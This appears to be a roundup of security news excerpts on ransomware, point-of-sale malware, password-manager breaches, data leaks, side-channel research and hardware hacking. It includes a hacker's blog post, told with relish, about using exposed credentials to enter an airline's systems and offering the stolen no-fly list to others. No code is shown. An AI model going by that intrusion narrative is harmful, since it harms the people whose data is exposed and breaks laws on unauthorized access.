Also: the government agencies really don’t encourage paying the ransom, except when they do.
Bad news, good news
Last Friday, France and Italy’s cybersecurity agencies sounded the alarm on the ransomware campaign that exploits CVE-2021-21974 – a 9.1/10 rated bug disclosed and patched two years ago.
The bad news: the ransomware infects ESXi, VMware’s bare metal hypervisor, which is a potential goldmine for attackers. Once they’ve compromised ESXi, they could move onto guest machines that run critical apps and data.
The good news is that it’s not a very sophisticated piece of malware. Sometimes the encryption and data exfiltration doesn’t work, and shortly after government agencies sounded the alarm, security researchers released their own decryption tool. Now CISA’s added its recovery tool to the pool of fixes.
The US agency compiled the tool using publicly available resources, including the decryptor and tutorial by Enes Sonmez and Ahmet Aykac. “This tool works by reconstructing virtual machine metadata from virtual disks that were not encrypted by the malware,” according to CISA.
Kaspersky discovered two new Prilex variants in early 2022 and found a third in November that can target NFC-enabled credit cards and block contactless transactions, forcing payers over to the less-secure PIN machines.
“The goal here is to force the victim to use their physical card by inserting it into the PIN pad reader, so the malware will be able to capture the data coming from the transaction,” the researchers write in a report published this week.
The malware’s new capabilities build on those that already make Prelix the most advanced POS threat, they add. It has a unique cryptographic scheme and can patch target software in real time, force protocol downgrades, run GHOST transactions, and run credit card fraud, including on the most sophisticated CHIP and PIN technologies.
Once the buyer puts the credit card into the PIN machine, all those techniques can go into action.
[…]
The tap-to-pay system activates the card’s RFID chip, which sends a unique ID number and transaction to the terminal, neither of which can be used again. There is nothing for a cybercriminal to steal.
[…]
When Prilex detects and blocks a contactless transaction, the EFT software will have the PIN system show an error message that reads “Contactless error, insert your card.”
It also can filter credit cards by segment and create different rules for each segment.
“For example, these rules can block NFC and capture card data only if the card is a Black/Infinite, Corporate or another tier with a high transaction limit, which is much more attractive than standard credit cards with a low balance/limit,” the researchers wrote.
A Dutch hacker arrested in November obtained and offered for sale the full name, address and date of birth of virtually everyone in Austria, the Alpine nation’s police said on Wednesday.
A user believed to be the hacker offered the data for sale in an online forum in May 2020, presenting it as “the full name, gender, complete address and date of birth of presumably every citizen” in Austria, police said in a statement, adding that investigators had confirmed its authenticity.
The trove comprised close to nine million sets of data, police said. Austria’s population is roughly 9.1 million. The hacker had also put “similar data sets” from Italy, the Netherlands and Colombia up for sale, Austrian police said, adding that they did not have further details.
[…]
The police did not elaborate on the consequences for Austrians’ data security.
Thousands of people who use Norton password manager began receiving emailed notices this month alerting them that an unauthorized party may have gained access to their personal information along with the passwords they have stored in their vaults.
Gen Digital, Norton’s parent company, said the security incident was the result of a credential-stuffing attack rather than an actual breach of the company’s internal systems. Gen’s portfolio of cybersecurity services has a combined user base of 500 million users — of which about 925,000 active and inactive users, including approximately 8,000 password manager users may have been targeted in the attack, a Gen spokesperson told CNET via email.
[…]
Norton’s intrusion detection systems detected an unusual number of failed login attempts on Dec. 12, the company said in its notice. On further investigation, around Dec. 22, Norton was able to determine that the attack began around Dec. 1.
“Norton promptly notified both regulators and customers as soon as the team was able to confirm that data was accessed in the attack,” Gen’s spokesperson said.
Personal data that may have been compromised includes Norton users’ full names, phone numbers and mailing addresses. Norton also said it “cannot rule out” that password manager vault data including users’ usernames and passwords were compromised in the attack.
“Systems have not been compromised, and they are safe and operational, but as is all too commonplace in today’s world, bad actors may take credentials found elsewhere, like the Dark Web, and create automated attacks to gain access to other unrelated accounts,”
note: this is a slightly more technical* and comedic write up of the story covered by my friends over at dailydot, which you can read here
*i say slightly since there isnt a whole lot of complicated technical stuff going on here in the first place
step 1: boredom
like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, chinese shodan), looking for exposed jenkins servers that may contain some interesting goods. at this point i’ve probably clicked through about 20 boring exposed servers with very little of any interest, when i suddenly start seeing some familar words. “ACARS“, lots of mentions of “crew” and so on. lots of words i’ve heard before, most likely while binge watching Mentour Pilot YouTube videos. jackpot. an exposed jenkins server belonging to CommuteAir.
step 2: how much access do we have really?
ok but let’s not get too excited too quickly. just because we have found a funky jenkins server doesn’t mean we’ll have access to much more than build logs. it quickly turns out that while we don’t have anonymous admin access (yes that’s quite frequently the case [god i love jenkins]), we do have access to build workspaces. this means we get to see the repositories that were built for each one of the ~70 build jobs.
step 3: let’s dig in
most of the projects here seem to be fairly small spring boot projects. the standardized project layout and extensive use of the resources directory for configuration files will be very useful in this whole endeavour.
the very first project i decide to look at in more detail is something about “ACARS incoming”, since ive heard the term acars before, and it sounds spicy. a quick look at the resource directory reveals a file called application-prod.properties (same also for -dev and -uat). it couldn’t just be that easy now, could it?
well, it sure is! two minutes after finding said file im staring at filezilla connected to a navtech sftp server filled with incoming and outgoing ACARS messages. this aviation shit really do get serious.
here is a sample of a departure ACARS message:
from here on i started trying to find journalists interested in a probably pretty broad breach of US aviation. which unfortunately got peoples hopes up in thinking i was behind the TSA problems and groundings a day earlier, but unfortunately im not quite that cool. so while i was waiting for someone to respond to my call for journalists i just kept digging, and oh the things i found.
as i kept looking at more and more config files in more and more of the projects, it dawned on me just how heavily i had already owned them within just half an hour or so. hardcoded credentials there would allow me access to navblue apis for refueling, cancelling and updating flights, swapping out crew members and so on (assuming i was willing to ever interact with a SOAP api in my life which i sure as hell am not).
i however kept looking back at the two projects named noflycomparison and noflycomparisonv2, which seemingly take the TSA nofly list and check if any of commuteair’s crew members have ended up there. there are hardcoded credentials and s3 bucket names, however i just cant find the actual list itself anywhere. probably partially because it seemingly always gets deleted immediately after processing it, most likely specifically because of nosy kittens like me.
fast forward a few hours and im now talking to Mikael Thalen, a staff writer at dailydot. i give him a quick rundown of what i have found so far and how in the meantime, just half an hour before we started talking, i have ended up finding AWS credentials. i now seemingly have access to pretty much their entire aws infrastructure via aws-cli. numerous s3 buckets, dozens of dynamodb tables, as well as various servers and much more. commute really loves aws.
i also share with him how close we seemingly are to actually finding the TSA nofly list, which would obviously immediately make this an even bigger story than if it were “only” a super trivially ownable airline. i had even peeked at the nofly s3 bucket at this point which was seemingly empty. so we took one last look at the noflycomparison repositories to see if there is anything in there, and for the first time actually take a peek at the test data in the repository. and there it is. three csv files, employee_information.csv, NOFLY.CSV and SELECTEE.CSV. all commited to the repository in july 2022. the nofly csv is almost 80mb in size and contains over 1.56 million rows of data. this HAS to be the real deal (we later get confirmation that it is indeed a copy of the nofly list from 2019).
holy shit, we actually have the nofly list. holy fucking bingle. what?! :3
with the jackpot found and being looked into by my journalism friends i decided to dig a little further into aws. grabbing sample documents from various s3 buckets, going through flight plans and dumping some dynamodb tables. at this point i had found pretty much all PII imaginable for each of their crew members. full names, addresses, phone numbers, passport numbers, pilot’s license numbers, when their next linecheck is due and much more. i had trip sheets for every flight, the potential to access every flight plan ever, a whole bunch of image attachments to bookings for reimbursement flights containing yet again more PII, airplane maintenance data, you name it.
i had owned them completely in less than a day, with pretty much no skill required besides the patience to sift through hundreds of shodan/zoomeye results.
so what happens next with the nofly data
while the nature of this information is sensitive, i believe it is in the public interest for this list to be made available to journalists and human rights organizations. if you are a journalist, researcher, or other party with legitimate interest, please reach out at nofly@crimew.gay. i will only give this data to parties that i believe will do the right thing with it.
note: if you email me there and i do not reply within a regular timeframe it is very likely my reply ended up in your spam folder or got lost. using email not hosted by google or msft is hell. feel free to dm me on twitter in that case.
support me
if you liked this or any of my other security research feel free to support me on my ko-fi. i am unemployed and in a rather precarious financial situation and do this research for free and for the fun of it, so anything goes a long way.
The short version of the latest drama is this: data stolen from Twitter more than a year ago found its way onto a major dark web marketplace this week. The asking price? The crypto equivalent of $2. In other words, it’s basically being given away for free. The hacker who posted the data haul, a user who goes by the moniker “StayMad,” shared the data on the market “Breached,” where anyone can now purchase and peruse it. The cache is estimated to cover at least 235 million people’s information.
[…]
According to multiple reports, the breach material includes the email addresses and/or phone numbers of some 235 million people, the credentials that users used to set up their accounts. This information has been paired with details publicly scraped from users’ profiles, thus allowing the cybercriminals to create more complete data dossiers on potential victims. Bleeping Computer reports that the information for each user includes not only email addresses and phone numbers but also names, screen names/user handles, follower count, and account creation date.
[…]
The data that appeared on “Breached” this week was actually stolen during 2021. Per the Washington Post, cybercriminals exploited an API vulnerability in Twitter’s platform to call up user information connected to hundreds of millions of user accounts. This bug created a bizarre “lookup” function, allowing any person to plug in a phone number or email to Twitter’s systems, which would then verify whether the credential was connected to an active account. The bug would also reveal which specific account was tied to the credential in question.
The vulnerability was originally discovered by Twitter’s bug bounty program in January of 2022 and was first publicly acknowledged last August.
Last week, just before Christmas, LastPass dropped a bombshell announcement: as the result of a breach in August, which led to another breach in November, hackers had gotten their hands on users’ password vaults. While the company insists that your login information is still secure, some cybersecurity experts are heavily criticizing its post, saying that it could make people feel more secure than they actually are and pointing out that this is just the latest in a series of incidents that make it hard to trust the password manager.
LastPass’ December 22nd statement was “full of omissions, half-truths and outright lies,” reads a blog post from Wladimir Palant, a security researcher known for helping originally develop AdBlock Pro, among other things. Some of his criticisms deal with how the company has framed the incident and how transparent it’s being; he accuses the company of trying to portray the August incident where LastPass says “some source code and technical information were stolen” as a separate breach when he says that in reality the company “failed to contain” the breach.
He also highlights LastPass’ admission that the leaked data included “the IP addresses from which customers were accessing the LastPass service,” saying that could let the threat actor “create a complete movement profile” of customers if LastPass was logging every IP address you used with its service.
Another security researcher, Jeremi Gosney, wrote a long post on Mastodon explaining his recommendation to move to another password manager. “LastPass’s claim of ‘zero knowledge’ is a bald-faced lie,” he says, alleging that the company has “about as much knowledge as a password manager can possibly get away with.”
LastPass claims its “zero knowledge” architecture keeps users safe because the company never has access to your master password, which is the thing that hackers would need to unlock the stolen vaults. While Gosney doesn’t dispute that particular point, he does say that the phrase is misleading. “I think most people envision their vault as a sort of encrypted database where the entire file is protected, but no — with LastPass, your vault is a plaintext file and only a few select fields are encrypted.”
Palant also notes that the encryption only does you any good if the hackers can’t crack your master password, which is LastPass’ main defense in its post: if you use its defaults for password length and strengthening and haven’t reused it on another site, “it would take millions of years to guess your master password using generally-available password-cracking technology” wrote Karim Toubba, the company’s CEO.
“This prepares the ground for blaming the customers,” writes Palant, saying that “LastPass should be aware that passwords will be decrypted for at least some of their customers. And they have a convenient explanation already: these customers clearly didn’t follow their best practices.” However, he also points out that LastPass hasn’t necessarily enforced those standards. Despite the fact that it made 12-character passwords the default in 2018, Palant says, “I can log in with my eight-character password without any warnings or prompts to change it.”
LastPass’ post has even elicited a response from a competitor, 1Password — on Wednesday, the company’s principal security architect Jeffrey Goldberg wrote a post for its site titled “Not in a million years: It can take far less to crack a LastPass password.” In it, Goldberg calls LastPass’ claim of it taking a million years to crack a master password “highly misleading,” saying that the statistic appears to assume a 12 character, randomly generated password. “Passwords created by humans come nowhere near meeting that requirement,” he writes, saying that threat actors would be able to prioritize certain guesses based on how people construct passwords they can actually remember.
Of course, a competitor’s word should probably be taken with a grain of salt, though Palant echos a similar idea in his post — he claims the viral XKCD method of creating passwords would take around 3 years to guess with a single GPU, while some 11-character passwords (that many people may consider to be good) would only take around 25 minutes to crack with the same hardware. It goes without saying that a motivated actor trying to crack into a specific target’s vault could probably throw more than one GPU at the problem, potentially cutting that time down by orders of magnitude.
Both Gosney and Palant take issue with LastPass’ actual cryptography too, though for different reasons. Gosney accuses the company of basically committing “every ‘crypto 101’ sin” with how its encryption is implemented and how it manages data once it’s been loaded into your device’s memory.
Meanwhile, Palant criticizes the company’s post for painting its password-strengthening algorithm, known as PBKDF2, as “stronger-than-typical.” The idea behind the standard is that it makes it harder to brute-force guess your passwords, as you’d have to perform a certain number of calculations on each guess. “I seriously wonder what LastPass considers typical,” writes Palant, “given that 100,000 PBKDF2 iterations are the lowest number I’ve seen in any current password manager.”
As smartphone manufacturers are improving the ear speakers in their devices, it can become easier for malicious actors to leverage a particular side-channel for eavesdropping on a targeted user’s conversations, according to a team of researchers from several universities in the United States.
The attack method, named EarSpy, is described in a paper published just before Christmas by researchers from Texas A&M University, Temple University, New Jersey Institute of Technology, Rutgers University, and the University of Dayton.
EarSpy relies on the phone’s ear speaker — the speaker at the top of the device that is used when the phone is held to the ear — and the device’s built-in accelerometer for capturing the tiny vibrations generated by the speaker.
[…]
Android security has improved significantly and it has become increasingly difficult for malware to obtain the required permissions.
On the other hand, accessing raw data from the motion sensors in a smartphone does not require any special permissions. Android developers have started placing some restrictions on sensor data collection, but the EarSpy attack is still possible, the researchers said.
A piece of malware planted on a device could use the EarSpy attack to capture potentially sensitive information and send it back to the attacker.
[…]
The researchers discovered that attacks such as EarSpy are becoming increasingly feasible due to the improvements made by smartphone manufacturers to ear speakers. They conducted tests on the OnePlus 7T and the OnePlus 9 smartphones — both running Android — and found that significantly more data can be captured by the accelerometer from the ear speaker due to the stereo speakers present in these newer models compared to the older model OnePlus phones, which did not have stereo speakers.
The experiments conducted by the academic researchers analyzed the reverberation effect of ear speakers on the accelerometer by extracting time-frequency domain features and spectrograms. The analysis focused on gender recognition, speaker recognition, and speech recognition.
In the gender recognition test, whose goal is to determine whether the target is male or female, the EarSpy attack had a 98% accuracy. The accuracy was nearly as high, at 92%, for detecting the speaker’s identity.
When it comes to actual speech, the accuracy was up to 56% for capturing digits spoken in a phone call.
In a reminder of smart home security’s dark side, two people hacked Ring security cameras to livestream swattings, according to a Los Angeles grand jury indictment (according to a report from Bloomberg). The pair called in hoax emergencies to authorities and livestreamed the police response on social media in late 2020.
James Thomas Andrew McCarty, 20, of Charlotte, North Carolina, and Kya Christian Nelson, 21, of Racine, Wisconsin, hacked into Yahoo email accounts to gain access to 12 Ring cameras across nine states in November 2020 (disclaimer: Yahoo is Engadget’s parent company). In one of the incidents, Nelson claimed to be a minor reporting their parents for firing guns while drinking alcohol. When police arrived, the pair used the Ring cameras to taunt the victims and officers while livestreaming — a pattern appearing in several incidents, according to prosecutors.
[…]
Although the smart devices can deter things like robberies and “porch pirates,” Amazon admits to providing footage to police without user consent or a court order when it believes someone is in danger. Inexplicably, the tech giant made a zany reality series using Ring footage, which didn’t exactly quell concerns about the tech’s Orwellian side.
Password locker LastPass has warned customers that the August 2022 attack on its systems saw unknown parties copy encrypted files that contains the passwords to their accounts.
In a December 22nd update to its advice about the incident, LastPass brings customers up to date by explaining that the August 2022 attack saw “some source code and technical information were stolen from our development environment and used to target another employee, obtaining credentials and keys which were used to access and decrypt some storage volumes within the cloud-based storage service.”
Those creds allowed the attacker to copy information “that contained basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass service.”
The update reveals that the attacker also copied “customer vault” data – the file LastPass uses to let customers record their passwords.
That file “is stored in a proprietary binary format that contains both unencrypted data, such as website URLs, as well as fully-encrypted sensitive fields such as website usernames and passwords, secure notes, and form-filled data.”
Which means the attackers have users’ passwords. But thankfully those passwords are encrypted with “256-bit AES encryption and can only be decrypted with a unique encryption key derived from each user’s master password”.
LastPass’ advice is that even though attackers have that file, customers who use its default settings have nothing to do as a result of this update as “it would take millions of years to guess your master password using generally-available password-cracking technology.”
One of those default settings is not to re-use the master password that is required to log into LastPass. The outfit suggests you make it a complex credential and use that password for just one thing: accessing LastPass.
LastPass therefore offered the following advice to individual and business users:
If your master password does not make use of the defaults above, then it would significantly reduce the number of attempts needed to guess it correctly. In this case, as an extra security measure, you should consider minimizing risk by changing passwords of websites you have stored.
Enjoy changing all those passwords, dear reader.
LastPass’s update concludes with news it decommissioned the systems breached in August 2022 and has built new infrastructure that adds extra protections.
[Lennert Wouters]’ team has been poking and prodding at the Starlink User Terminal, trying to get root access, and needed to bypass the ARM Trusted Firmware boot-time integrity checks. The terminal’s PCB is satellite-dish-sized, so things like laser fault injection are hard to set up – hence, they went the voltage injection route. Much poking and prodding later, they developed a way to reliably glitch the CPU into verifying a faulty firmware, and got to a root shell – the journey described in a BlackHat talk embedded below.
To make the hack more compact, repeatable and cheap, they decided to move it from a mess of wires and boards into slim form-factor, and that’s where the modchip design was made. For that, they put the terminal PCB into a scanner, traced a board outline out, loaded it into KiCad, and put all the necessary voltage glitching and monitoring parts on a single board, driven by the venerable RP2040 – this board has everything you’d need if you wanted to get root on the Starlink User Terminal. Thanks to the modchip design’s flexibility, when Starlink released a firmware update disabling the UART output used for monitoring, they could easily re-route the signal to an eMMC data line instead. Currently, the KiCad source files aren’t available, but there’s Gerber and BOM files on GitHub in case we want to make our own!
Hacks like these, undoubtedly, set a new bar for what we can achieve while bypassing security protections. Hackers have been designing all kinds of modchips, for both proprietary and open tech – we’ve seen one that lets you use third-party filters in your “smart” air purifier, another that lets you use your own filament with certain 3D printers, but there’s also one that lets you add a ton of games to an ArduBoy. With RP2040 in particular, just this year we’ve seen used to build a Nintendo 64 flash cart, a PlayStation 1 memory card, and a mod that adds homebrew support to a GameCube. If you were looking to build hardware addons that improve upon tech you use, whether by removing protections or adding features, there’s no better time than nowadays!